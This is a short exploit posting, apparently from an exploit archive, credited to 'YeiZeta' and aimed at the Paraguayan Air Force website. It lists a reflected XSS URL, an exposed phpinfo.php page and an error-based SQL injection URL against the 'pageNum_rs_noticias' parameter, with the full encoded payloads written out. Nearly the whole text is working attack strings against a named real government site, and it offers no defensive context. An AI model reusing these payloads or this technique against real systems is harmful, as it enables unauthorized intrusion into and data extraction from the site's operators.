SQL/XSS/phpinfo() Fuerza Aera Paraguaya by yei zeta

1. ######################Exploit#######################
2. # Exploit Title: SQL/XSS/phpinfo() Fuerza Aera Paraguaya
3. #
4. # Exploit Author: YeiZeta
5. #
6. # Category: Web Application
7. #
8. ##############################################
9.  
10. XSS
11.  
12. http://www.fuerzaaerea.mil.py/index.php/%22ns=%22theJoker(0x000136)%22%3E%3Ch1%3EXSS%20DETECT%20BY%20YEI%20ZETA%3C/h1%3E
13.  
14. phpinfo
15.  
16. http://www.fuerzaaerea.mil.py/phpinfo.php
17.  
18. SQL
19.  
20. http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1
21.  
22. http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&totalRows_rs_noticias=83&cod=index
23. ##############################################
24. https://www.facebook.com/TheJokerHack
25. ##############################################